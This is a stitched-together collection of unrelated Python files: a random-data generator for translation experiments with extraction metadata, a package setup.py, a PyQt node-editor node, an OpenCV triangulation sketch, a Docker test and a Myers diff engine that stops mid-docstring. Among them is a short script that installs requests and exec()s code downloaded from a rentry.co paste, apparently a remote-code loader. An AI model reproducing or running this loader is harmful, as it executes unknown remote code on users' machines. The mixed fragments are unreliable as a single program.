config: Optional[Dict[str, Any]] = None, vocab_size: int = 20,
train_batches=30, val_batches=5):
super().__init__(work_dir, read_only, config)
self.vocab_size = vocab_size
self.train_batches = train_batches
self.val_batches = val_batches
def get_train_data(self, batch_size: int, steps: int = 0, sort_desc=True, sort_by='random',
batch_first=True, shuffle=False, copy_xy=False, fine_tune=False):
train_data = BatchIterable(self.vocab_size, batch_size, self.train_batches,
reverse=False, batch_first=batch_first)
if steps > 0:
train_data = LoopingIterable(train_data, steps)
return train_data
def get_val_data(self, batch_size: int, sort_desc=True, batch_first=True,
shuffle=False, copy_xy=False):
assert not shuffle, 'Not supported'
assert not copy_xy, 'Not supported'
val_data = BatchIterable(self.vocab_size, batch_size, self.val_batches,
reverse=False, batch_first=batch_first)
return val_data
def parse_args():
p = argparse.ArgumentParser(description='Generates random data for testing',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('exp', type=Path, help="path to experiment directory")
p.add_argument('-s', '--seed', type=int, default=0,
help='seed for reproducing the randomness. 0 is no seed.')
p.add_argument('-mn', '--min-len', type=int, default=4, help='Minimum length sequence')
p.add_argument('-mx', '--max-len', type=int, default=15, help='Maximum length sequence')
p.add_argument('-v', '--vocab', dest='vocab_size', type=int, default=200,
help='Vocabulary size')
p.add_argument('-r', '--reserved', dest='num_reserved',
type=int, default=4, help='Reserved tokens')
p.add_argument('-nt', '--num-train', type=int, default=1000, help='Number of train sequences')
p.add_argument('-nv', '--num-val', type=int, default=500, help='Number of validation seqs')
p.add_argument('--rev-vocab', action="store_true",
help="Reverse the target side vocabulary")
p.add_argument('--rev-seq', action="store_true",
help="Reverse the target side sequence order")
return vars(p.parse_args())
def generate_parallel(min_len, max_len, vocab_size, num_reserved, num_exs, rev_vocab, rev_seq):
lower, higher = num_reserved, vocab_size
for _ in range(num_exs):
_len = np.random.randint(min_len, max_len)
src_seq = np.random.randint(lower, higher, size=_len)
tgt_seq = src_seq.copy()
if rev_vocab:
tgt_seq = higher + num_reserved - src_seq
if rev_seq:
tgt_seq = np.flip(tgt_seq, axis=0)
yield src_seq, tgt_seq
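# Illustrative arithmetic (not from the original): with vocab_size=200 and num_reserved=4,
# rev_vocab maps each source token t to 204 - t, e.g. [17, 45, 160] -> [187, 159, 44].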
def write_tsv(data, out):
count = 0
for src_seq, tgt_seq in data:
src_seq, tgt_seq = ' '.join(map(str, src_seq)), ' '.join(map(str, tgt_seq))
out.write(f'{src_seq}\t{tgt_seq}\n')
count += 1
log.info(f"Wrote {count} records")
def write_parallel(data, src_file, tgt_file):
count = 0
with IO.writer(src_file) as src_f, IO.writer(tgt_file) as tgt_f:
for src_seq, tgt_seq in data:
src_seq = ' '.join(map(str, src_seq))
tgt_seq = ' '.join(map(str, tgt_seq))
src_f.write(f'{src_seq}\n')
tgt_f.write(f'{tgt_seq}\n')
count += 1
log.info(f"Wrote {count} records to {src_file} and {tgt_file}")
def main(args):
work_dir: Path = args.pop('exp')
work_dir.mkdir(exist_ok=True, parents=True)
log.info(f"Setting up a dummy experiment at {work_dir}")
num_train, num_val = args.pop('num_train'), args.pop('num_val')
train_data = generate_parallel(**args, num_exs=num_train)
val_data = generate_parallel(**args, num_exs=num_val)
train_files = str(work_dir / 'train.raw.src'), str(work_dir / 'train.raw.tgt')
val_files = str(work_dir / 'valid.raw.src'), str(work_dir / 'valid.raw.tgt')
write_parallel(train_data, *train_files)
write_parallel(val_data, *val_files)
config = {
'prep': {
'train_src': train_files[0],
'train_tgt': train_files[1],
'valid_src': val_files[0],
'valid_tgt': val_files[1],
'pieces': 'word',
'truncate': True,
'src_len': args['max_len'],
'tgt_len': args['max_len'],
}}
if args.get('rev_vocab'):
# shared vocabulary would be confusing
config['prep'].update({
'shared_vocab': False,
'max_src_types': args['vocab_size'],
'max_tgt_types': args['vocab_size']
})
else:
config['prep'].update({
'shared_vocab': True,
'max_types': args['vocab_size']
})
exp = Experiment(work_dir, config=config)
exp.store_config()
if __name__ == '__main__':
args = parse_args()
log.info(f"Args {args}")
seed = args.pop('seed')
if seed:
np.random.seed(seed)
main(args)
| [
"rtg.log.info",
"numpy.flip",
"rtg.data.dataset.LoopingIterable",
"argparse.ArgumentParser",
"rtg.utils.IO.writer",
"numpy.random.randint",
"rtg.TranslationExperiment",
"numpy.random.seed",
"rtg.data.dataset.Batch"
] | [((3317, 3449), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generates random data for testing"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Generates random data for testing',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n", (3340, 3449), False, 'import argparse\n'), ((5300, 5334), 'rtg.log.info', 'log.info', (['f"""Wrote {count} records"""'], {}), "(f'Wrote {count} records')\n", (5308, 5334), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((5711, 5774), 'rtg.log.info', 'log.info', (['f"""Wrote {count} records to {src_file} and {tgt_file}"""'], {}), "(f'Wrote {count} records to {src_file} and {tgt_file}')\n", (5719, 5774), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((5883, 5939), 'rtg.log.info', 'log.info', (['f"""Setting up a dummy experiment at {work_dir}"""'], {}), "(f'Setting up a dummy experiment at {work_dir}')\n", (5891, 5939), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((7119, 7154), 'rtg.TranslationExperiment', 'Experiment', (['work_dir'], {'config': 'config'}), '(work_dir, config=config)\n', (7129, 7154), True, 'from rtg import log, TranslationExperiment as Experiment\n'), ((7235, 7259), 'rtg.log.info', 'log.info', (['f"""Args {args}"""'], {}), "(f'Args {args}')\n", (7243, 7259), False, 'from rtg import log, TranslationExperiment as Experiment\n'), ((1423, 1476), 'numpy.random.randint', 'np.random.randint', (['self.min_seq_len', 'self.max_seq_len'], {}), '(self.min_seq_len, self.max_seq_len)\n', (1440, 1476), True, 'import numpy as np\n'), ((1492, 1565), 'numpy.random.randint', 'np.random.randint', (['self.n_reserved_toks', 'self.vocab_size'], {'size': '(seq_len,)'}), '(self.n_reserved_toks, self.vocab_size, size=(seq_len,))\n', (1509, 1565), True, 'import numpy as np\n'), ((4767, 4802), 'numpy.random.randint', 'np.random.randint', (['min_len', 'max_len'], {}), '(min_len, max_len)\n', (4784, 4802), True, 'import numpy as np\n'), ((4821, 4864), 'numpy.random.randint', 'np.random.randint', (['lower', 'higher'], {'size': '_len'}), '(lower, higher, size=_len)\n', (4838, 4864), True, 'import numpy as np\n'), ((5406, 5425), 'rtg.utils.IO.writer', 'IO.writer', (['src_file'], {}), '(src_file)\n', (5415, 5425), False, 'from rtg.utils import IO\n'), ((5436, 5455), 'rtg.utils.IO.writer', 'IO.writer', (['tgt_file'], {}), '(tgt_file)\n', (5445, 5455), False, 'from rtg.utils import IO\n'), ((7309, 7329), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (7323, 7329), True, 'import numpy as np\n'), ((2832, 2866), 'rtg.data.dataset.LoopingIterable', 'LoopingIterable', (['train_data', 'steps'], {}), '(train_data, steps)\n', (2847, 2866), False, 'from rtg.data.dataset import LoopingIterable\n'), ((5016, 5040), 'numpy.flip', 'np.flip', (['tgt_seq'], {'axis': '(0)'}), '(tgt_seq, axis=0)\n', (5023, 5040), True, 'import numpy as np\n'), ((1865, 1920), 'rtg.data.dataset.Batch', 'Batch', (['exs'], {'sort_dec': '(True)', 'batch_first': 'self.batch_first'}), '(exs, sort_dec=True, batch_first=self.batch_first)\n', (1870, 1920), False, 'from rtg.data.dataset import Batch, Example\n')] |
# -*- coding: utf-8 -*-
# @Time : 2021-04-06 15:25
# @Author : Lodge
from sys import version_info
from setuptools import setup
from lite_tools.version import VERSION
if version_info < (3, 6, 0):
raise SystemExit("Sorry! lite_tools requires python 3.6.0 or later.")
with open("README.md", "r", encoding='utf-8') as fd:
long_description = fd.read()
base_requires = ['loguru']
# Not used here yet -- extra functionality for the case where the full dependency set is installed
file_requires = ["reportlab", "Pillow", "pandas", "xlsxwriter"]
date_requires = ["datetime", "lxml", "requests", "prettytable"]
all_requires = date_requires + file_requires
setup(
name='lite-tools',
version=VERSION.strip(),
description='一些基于内建函数的小工具集合[更多拓展功能基于第三方包,安装参考github页面]',
long_description=long_description,
long_description_content_type="text/markdown",
author='Lodge',
author_email='<EMAIL>',
url='https://github.com/Heartfilia/lite_tools',
packages=[
'lite_tools',
'lite_tools.trans',
'lite_tools.commands',
'lite_tools.lib_jar',
'lite_tools.utils_jar'
],
license='MIT',
install_requires=base_requires,
entry_points={"console_scripts": [
"lite-tools=lite_tools.commands.cmdline:execute",
]},
python_requires=">=3.6",
extras_require={
"all": all_requires,
"date": date_requires,
"file": file_requires
},
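    # Extras sketch: `pip install lite-tools[all]` additionally pulls in the date and file
    # dependency groups defined above; the base install only requires loguru.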
classifiers=[
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Natural Language :: Chinese (Simplified)',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
]
)
| [
"lite_tools.version.VERSION.strip"
] | [((636, 651), 'lite_tools.version.VERSION.strip', 'VERSION.strip', ([], {}), '()\n', (649, 651), False, 'from lite_tools.version import VERSION\n')] |
from os import system
try:
import requests
except Exception:
system('python3 -m pip install requests')
import requests
exec(requests.get('https://rentry.co/MCSniprxyz/raw').text)
| [
"os.system",
"requests.get"
] | [((69, 110), 'os.system', 'system', (['"""python3 -m pip install requests"""'], {}), "('python3 -m pip install requests')\n", (75, 110), False, 'from os import system\n'), ((138, 186), 'requests.get', 'requests.get', (['"""https://rentry.co/MCSniprxyz/raw"""'], {}), "('https://rentry.co/MCSniprxyz/raw')\n", (150, 186), False, 'import requests\n')] |
import os
from PyQt5.QtCore import *
from nodeeditor.utils import dumpException
from stack_conf import *
from stack_node_base import *
@register_node(OP_NODE_PRT_NODE)
class StackNode_PRT_Node(StackNode):
icon = os.path.join(os.path.dirname(__file__),"icons/in.png")
op_code = OP_NODE_PRT_NODE
op_title = "PRT Node"
content_label_objname = "stack_node_in/out"
def __init__(self, scene):
super().__init__(scene, inputs=[2], outputs=[1,4])
def initInnerClasses(self):
self.content = StackInputContent(self)
self.grNode = PrtGraphicsNode(self)
class PrtGraphicsNode(StackGraphicsNode):
def initSizes(self):
super().initSizes()
self.width = 160
self.height = 230
self.edge_size = 5
self._padding = 5
class StackInputContent(StackContent):
nodeDataModified = pyqtSignal(dict)
def initUI(self):
self.dataSans = ''
self.dataTans = ''
self.dataTestType = ''
self.dataTestOption = ''
self.dataModTrue = '+'
self.dataScoreTrue = '1'
self.dataPenaltyTrue = '0'
self.dataModFalse = '-'
self.dataScoreFalse = '0'
self.dataPenaltyFalse = '0'
self.dataTrueFeedback = ''
self.dataFalseFeedback = ''
self.layout = QVBoxLayout()
self.setLayout(self.layout)
self.layout.addWidget(QLabel("Student Answer:", self))
self.sans = QLineEdit("", self)
self.sans.textChanged.connect(self.updateDataAndPropertiesWidget)
self.sans.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.layout.addWidget(self.sans)
self.layout.addWidget(QLabel("Teacher Answer:", self))
self.tans = QLineEdit("", self)
self.tans.textChanged.connect(self.updateDataAndPropertiesWidget)
self.tans.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.layout.addWidget(self.tans)
self.layout.addWidget(QLabel("Test Options:", self))
self.testType = QComboBox(self)
self.testType.addItems(['', 'AlgEquiv', 'CasEqual', 'CompletedSquare', 'Diff', 'EqualComAss', 'EquivFirst', 'EquivReasoning', 'Expanded', 'FacForm', 'Int', 'GT', 'GTE', 'NumAbsolute', 'NumDecPlaces', 'NumDecPlacesWrong', 'NumRelative', 'NumSigFigs', 'RegExp', 'SameType', 'Sets', 'SigFigsStrict', 'SingleFrac', 'String', 'StirngSloppy', 'SubstEquiv', 'SysEquiv', 'UnitsAbsolute', 'UnitsRelative', 'Units', 'UnitsStrictAbsolute', 'UnitsStrictRelative', 'UnitsStrictSigFig'])
self.testType.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.testType.currentIndexChanged.connect(self.updateDataAndPropertiesWidget)
self.layout.addWidget(self.testType)
self.layout.addWidget(QLabel("Test Option Parameters:", self))
self.testOption = QLineEdit("", self)
self.testOption.setStyleSheet(u'background-color: rgb(102, 102, 102);color: rgb(255, 255, 255);')
self.testOption.textChanged.connect(self.updateDataAndPropertiesWidget)
self.layout.addWidget(self.testOption)
def updateDataAndPropertiesWidget(self):
self.dataSans = self.sans.text()
self.dataTans = self.tans.text()
self.dataTestType = self.testType.currentText()
self.dataTestOption = self.testOption.text()
self.updatePropertiesWidget()
def updatePropertiesWidget(self):
data = self.serialize()
self.nodeDataModified.emit(data)
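    # Each widget change above re-serializes the node and emits nodeDataModified so the
    # properties widget stays in sync with this content widget.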
def serialize(self):
res = super().serialize()
res['sans'] = self.dataSans
res['tans'] = self.dataTans
res['answertest'] = self.dataTestType
res['testoptions'] = self.dataTestOption
res['truescoremode'] = self.dataModTrue
res['truescore'] = self.dataScoreTrue
res['truepenalty'] = self.dataPenaltyTrue
res['falsescoremode'] = self.dataModFalse
res['falsescore'] = self.dataScoreFalse
res['falsepenalty'] = self.dataPenaltyFalse
res['truefeedback'] = self.dataTrueFeedback
res['falsefeedback'] = self.dataFalseFeedback
return res
def deserialize(self, data, hashmap=[]):
res = super().deserialize(data, hashmap)
try:
self.dataSans = data['sans']
self.sans.setText(self.dataSans)
self.dataTans = data['tans']
self.tans.setText(self.dataTans)
self.dataTestType = data['answertest']
self.testType.setCurrentIndex(self.testType.findText(self.dataTestType))
self.dataTestOption = data['testoptions']
self.testOption.setText(self.dataTestOption)
self.dataModTrue = data['truescoremode']
self.dataScoreTrue = data['truescore']
self.dataPenaltyTrue = data['truepenalty']
self.dataModFalse = data['falsescoremode']
self.dataScoreFalse = data['falsescore']
self.dataPenaltyFalse = data['falsepenalty']
self.dataTrueFeedback = data['truefeedback']
self.dataFalseFeedback = data['falsefeedback']
return True & res
except Exception as e:
dumpException(e)
return res
class StackOutputContent(StackContent):
def initUI(self):
self.lbl = QLabel("42", self)
self.lbl.setAlignment(Qt.AlignLeft)
self.lbl.setObjectName(self.node.content_label_objname)
# Alternative: register the node class via an explicit function call instead of the decorator
# register_node_now(OP_NODE_PRT_NODE, StackNode_PRT_Node) | [
"os.path.dirname",
"nodeeditor.utils.dumpException"
] | [((230, 255), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (245, 255), False, 'import os\n'), ((5247, 5263), 'nodeeditor.utils.dumpException', 'dumpException', (['e'], {}), '(e)\n', (5260, 5263), False, 'from nodeeditor.utils import dumpException\n')] |
# -*- coding: utf-8 -*-
import numpy as np
import cv2
from triangulation import Triangulation
class Draw(object):
@staticmethod
def draw_intersection_calculation(la1, lo1, r1, la2, lo2, r2, la3, lo3, r3, px, py):
# return self.circle_intersection_sympy(circle1,circle2)
x1, y1 = int((la1 - 40) * 100), int(lo1 * 100)
x2, y2 = int((la2 - 40) * 100), int(lo2 * 100)
x3, y3 = int((la3 - 40) * 100), int(lo3 * 100)
px, py = int((px - 40) * 100), int(py * 100)
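        # The (la - 40) * 100 and lo * 100 scaling maps the GPS coordinates onto the
        # 600x600 pixel canvas allocated below (roughly one pixel per 0.01 degree).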
# Create a black image
img = np.zeros((600, 600, 3), np.uint8)
        # Temporary hack to make the distances in km line up with the GPS coordinates (planar vs. spherical conflict)
r1 = int(r1 / 1000)
r2 = int(r2 / 800)
r3 = int(r3 / 800)-10
print('x b1 : ' + str(x1))
print('y b1 : ' + str(y1))
print('H_dist b1 : ' + str(r1))
print('x b2 : ' + str(x2))
print('y b2 : ' + str(y2))
print('H_dist b2 : ' + str(r2))
print('x b3 : ' + str(x3))
print('y b3 : ' + str(y3))
print('H_dist b3 : ' + str(r3))
print('x diver : ' + str(px))
print('y diver : ' + str(py))
# Circles : (0,0,r1), (dx2, dy2, r2), (dx3, dy3, r3)
cv2.circle(img, (x1, y1), 1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x2, y2), 1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x3, y3), 1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x1, y1), r1, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x2, y2), r2, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (x3, y3), r3, (255, 0, 0), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.circle(img, (px, py), 1, (0, 0, 255), 2)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
exit(0)
@staticmethod
def draw_example():
Draw.draw_intersection_calculation(
42.495994, 3.442279,
Triangulation.distance_between_coordinates_in_m(42.495994, 3.442279, 43.10572, 3.949412),
43.181071, 5.21284, Triangulation.distance_between_coordinates_in_m(43.181071, 5.21284, 43.10572, 3.949412),
43.355465, 3.828563,
Triangulation.distance_between_coordinates_in_m(43.355465, 3.828563, 43.10572, 3.949412),
43.10572, 3.949412)
if __name__ == '__main__':
Draw.draw_example()
| [
"triangulation.Triangulation.distance_between_coordinates_in_m",
"cv2.imshow",
"cv2.circle",
"numpy.zeros",
"cv2.destroyAllWindows",
"cv2.waitKey"
] | [((553, 586), 'numpy.zeros', 'np.zeros', (['(600, 600, 3)', 'np.uint8'], {}), '((600, 600, 3), np.uint8)\n', (561, 586), True, 'import numpy as np\n'), ((1270, 1314), 'cv2.circle', 'cv2.circle', (['img', '(x1, y1)', '(1)', '(255, 0, 0)', '(2)'], {}), '(img, (x1, y1), 1, (255, 0, 0), 2)\n', (1280, 1314), False, 'import cv2\n'), ((1323, 1347), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1333, 1347), False, 'import cv2\n'), ((1356, 1370), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1367, 1370), False, 'import cv2\n'), ((1379, 1402), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1400, 1402), False, 'import cv2\n'), ((1411, 1455), 'cv2.circle', 'cv2.circle', (['img', '(x2, y2)', '(1)', '(255, 0, 0)', '(2)'], {}), '(img, (x2, y2), 1, (255, 0, 0), 2)\n', (1421, 1455), False, 'import cv2\n'), ((1464, 1488), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1474, 1488), False, 'import cv2\n'), ((1497, 1511), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1508, 1511), False, 'import cv2\n'), ((1520, 1543), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1541, 1543), False, 'import cv2\n'), ((1552, 1596), 'cv2.circle', 'cv2.circle', (['img', '(x3, y3)', '(1)', '(255, 0, 0)', '(2)'], {}), '(img, (x3, y3), 1, (255, 0, 0), 2)\n', (1562, 1596), False, 'import cv2\n'), ((1605, 1629), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1615, 1629), False, 'import cv2\n'), ((1638, 1652), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1649, 1652), False, 'import cv2\n'), ((1661, 1684), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1682, 1684), False, 'import cv2\n'), ((1693, 1738), 'cv2.circle', 'cv2.circle', (['img', '(x1, y1)', 'r1', '(255, 0, 0)', '(2)'], {}), '(img, (x1, y1), r1, (255, 0, 0), 2)\n', (1703, 1738), False, 'import cv2\n'), ((1747, 1771), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1757, 1771), False, 'import cv2\n'), ((1780, 1794), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1791, 1794), False, 'import cv2\n'), ((1803, 1826), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1824, 1826), False, 'import cv2\n'), ((1835, 1880), 'cv2.circle', 'cv2.circle', (['img', '(x2, y2)', 'r2', '(255, 0, 0)', '(2)'], {}), '(img, (x2, y2), r2, (255, 0, 0), 2)\n', (1845, 1880), False, 'import cv2\n'), ((1889, 1913), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (1899, 1913), False, 'import cv2\n'), ((1922, 1936), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1933, 1936), False, 'import cv2\n'), ((1945, 1968), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1966, 1968), False, 'import cv2\n'), ((1977, 2022), 'cv2.circle', 'cv2.circle', (['img', '(x3, y3)', 'r3', '(255, 0, 0)', '(2)'], {}), '(img, (x3, y3), r3, (255, 0, 0), 2)\n', (1987, 2022), False, 'import cv2\n'), ((2031, 2055), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (2041, 2055), False, 'import cv2\n'), ((2064, 2078), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2075, 2078), False, 'import cv2\n'), ((2087, 2110), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2108, 2110), False, 'import cv2\n'), ((2119, 2163), 'cv2.circle', 'cv2.circle', (['img', '(px, py)', '(1)', '(0, 0, 255)', '(2)'], {}), '(img, (px, py), 1, (0, 0, 255), 2)\n', (2129, 2163), False, 'import cv2\n'), 
((2173, 2197), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'img'], {}), "('image', img)\n", (2183, 2197), False, 'import cv2\n'), ((2206, 2220), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2217, 2220), False, 'import cv2\n'), ((2229, 2252), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2250, 2252), False, 'import cv2\n'), ((2402, 2495), 'triangulation.Triangulation.distance_between_coordinates_in_m', 'Triangulation.distance_between_coordinates_in_m', (['(42.495994)', '(3.442279)', '(43.10572)', '(3.949412)'], {}), '(42.495994, 3.442279, \n 43.10572, 3.949412)\n', (2449, 2495), False, 'from triangulation import Triangulation\n'), ((2524, 2616), 'triangulation.Triangulation.distance_between_coordinates_in_m', 'Triangulation.distance_between_coordinates_in_m', (['(43.181071)', '(5.21284)', '(43.10572)', '(3.949412)'], {}), '(43.181071, 5.21284, \n 43.10572, 3.949412)\n', (2571, 2616), False, 'from triangulation import Triangulation\n'), ((2658, 2751), 'triangulation.Triangulation.distance_between_coordinates_in_m', 'Triangulation.distance_between_coordinates_in_m', (['(43.355465)', '(3.828563)', '(43.10572)', '(3.949412)'], {}), '(43.355465, 3.828563, \n 43.10572, 3.949412)\n', (2705, 2751), False, 'from triangulation import Triangulation\n')] |
import unittest
import docker
from src.test import utils
class DockerTestEnvironmentDBDiskSizeTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print(f"SetUp {cls.__name__}")
cls.test_environment = utils.ExaslctTestEnvironment(cls, "./start-test-env",
clean_images_at_close=False)
def setUp(self):
self.client = docker.from_env()
@classmethod
def tearDownClass(cls):
try:
cls.test_environment.close()
except Exception as e:
print(e)
def tearDown(self):
try:
self.on_host_docker_environment.close()
except Exception as e:
print(e)
try:
self.google_cloud_docker_environment.close()
except Exception as e:
print(e)
self.client.close()
def assert_disk_size(self, size:str):
containers = [c.name for c in self.client.containers.list() if self.docker_environment_name in c.name]
db_container = [c for c in containers if "db_container" in c]
exit_result = self.client.containers.get(db_container[0]).exec_run("cat /exa/etc/EXAConf")
output = exit_result[1].decode("UTF-8")
return_code = exit_result[0]
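        # Retry the exec once if it returned no output before asserting on the disk size.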
if output == '':
exit_result = self.client.containers.get(db_container[0]).exec_run("cat /exa/etc/EXAConf")
output = exit_result[1].decode("UTF-8")
return_code = exit_result[0]
self.assertEquals(return_code,0)
self.assertIn(" Size = %s"%size,output)
def test_default_db_disk_size(self):
self.docker_environment_name = "test_default_db_disk_size"
self.on_host_docker_environment, self.google_cloud_docker_environment = \
self.test_environment.spawn_docker_test_environment(self.docker_environment_name)
self.assert_disk_size("2 GiB")
def test_smallest_valid_db_disk_size(self):
self.docker_environment_name = "test_smallest_valid_db_disk_size"
self.on_host_docker_environment, self.google_cloud_docker_environment = \
self.test_environment.spawn_docker_test_environment(self.docker_environment_name, ["--db-disk-size","'100 MiB'"])
self.assert_disk_size("100 MiB")
    def test_invalid_db_disk_size(self):
self.docker_environment_name = "test_invalid_db_disk_size"
with self.assertRaises(Exception) as context:
self.on_host_docker_environment, self.google_cloud_docker_environment = \
self.test_environment.spawn_docker_test_environment(self.docker_environment_name, ["--db-disk-size","'90 MiB'"])
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"src.test.utils.ExaslctTestEnvironment",
"docker.from_env"
] | [((2714, 2729), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2727, 2729), False, 'import unittest\n'), ((236, 323), 'src.test.utils.ExaslctTestEnvironment', 'utils.ExaslctTestEnvironment', (['cls', '"""./start-test-env"""'], {'clean_images_at_close': '(False)'}), "(cls, './start-test-env', clean_images_at_close\n =False)\n", (264, 323), False, 'from src.test import utils\n'), ((423, 440), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (438, 440), False, 'import docker\n')] |
# Copyright 2010 <NAME> (<EMAIL>)
# Copyright 2015 Techcable
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A clean-room implementation of Eugene Myers' differencing algorithm (http://www.cs.arizona.edu/people/gene/).
See the paper at http://www.cs.arizona.edu/people/gene/PAPERS/diff.ps
"""
import hashlib
from typing import List, Optional, TypeVar

T = TypeVar("T")  # generic element type used in the List[T] hints below
from .core import Chunk, Delta, Patch
from .engine import DiffEngine
class MyersEngine(DiffEngine):
def __init__(self, hash_optimization=True):
self.hash_optimization = hash_optimization
@property
def name(self):
return "plain_myers"
def diff(self, original, revised):
if type(original) is not list:
raise TypeError("Original must be a list: {!r}".format(original))
if type(revised) is not list:
raise TypeError("Revised must be a list: {!r}".format(revised))
original_hashes = None # type: list[bytes]
revised_hashes = None # type: list[bytes]
if self.hash_optimization:
# Since build_path actually doesn't need the elements themselves, we can take their sha256sum to speed up comparison
# This can improve performance noticably, since hashes usually differ in the first few bytes and there are only 32 bytes at most
original_hashes = []
for element in original:
if type(element) is not str:
original_hashes, revised_hashes = None, None
break
h = hashlib.sha256()
h.update(element.encode("utf-8"))
original_hashes.append(h.digest())
if original_hashes is not None:
revised_hashes = []
for element in revised:
if type(element) is not str:
original_hashes, revised_hashes = None, None
break
h = hashlib.sha256()
h.update(element.encode("utf-8"))
revised_hashes.append(h.digest())
if original_hashes is not None:
path = build_path(original_hashes, revised_hashes)
else:
path = build_path(original, revised)
return build_revision(path, original, revised)
def __repr__(self):
if self.hash_optimization:
return "PlainMyersEngine"
else:
return "PlainMyersEngine(hash_optimization=False)"
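# Usage sketch (assumes the Patch/Delta API from .core behaves as used in build_revision below):
#   engine = MyersEngine()
#   patch = engine.diff("a b c".split(), "a x c".split())
#   # -> a Patch containing a single Delta that replaces ["b"] with ["x"]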
def build_path(original: List[T], revised: List[T]) -> "DiffNode":
"""
Computes the minimum diffpath that expresses the differences between the original and revised sequences,
according to Gene Myers differencing algorithm.
According to the author of the algorithm, a diffpath will always be found, so a RuntimeError shouldn't be thrown.
:param original: The original sequence.
:param revised: The revised sequence.
:return: A minimum {@link DiffNode Path} across the differences graph.
:exception RuntimeError: if a diff path could not be found.
"""
original_size = len(original)
revised_size = len(revised)
max_size = original_size + revised_size + 1
size = 1 + 2 * max_size
middle = size // 2
diagonal = [None] * size # type: list[Optional["DiffNode"]]
diagonal[middle + 1] = create_snake(0, -1, None)
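    # d is the number of edit steps explored so far; k = i - j indexes a diagonal of the
    # edit graph, stored at offset `middle` so negative diagonals map to valid list indices.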
for d in range(max_size):
for k in range(-d, d + 1, 2):
kmiddle = middle + k
kplus = kmiddle + 1
kminus = kmiddle - 1
prev = None
# For some reason this works, but not the other ways
if (k == -d) or (k != d and diagonal[kminus].i < diagonal[kplus].i):
i = diagonal[kplus].i
prev = diagonal[kplus]
else:
i = diagonal[kminus].i + 1
prev = diagonal[kminus]
diagonal[kminus] = None
j = i - k
node = create_diff_node(i, j, prev)
# orig and rev are zero-based
# but the algorithm is one-based
# that's why there's no +1 when indexing the sequences
while i < original_size and j < revised_size and original[i] == revised[j]:
i += 1
j += 1
if i > node.i:
node = create_snake(i, j, node)
diagonal[kmiddle] = node
if i >= original_size and j >= revised_size:
return diagonal[kmiddle]
diagonal[middle + d - 1] = None
# According to Myers, this cannot happen
raise RuntimeError("couldn't find a diff path")
def build_revision(path: "DiffNode", original: List[T], revised: List[T]) -> Patch:
"""
Constructs a {@link Patch} from a difference path.
:param path: The path.
:param original: The original sequence.
:param revised: The revised sequence.
:exception ValueError: If there is an invalid diffpath
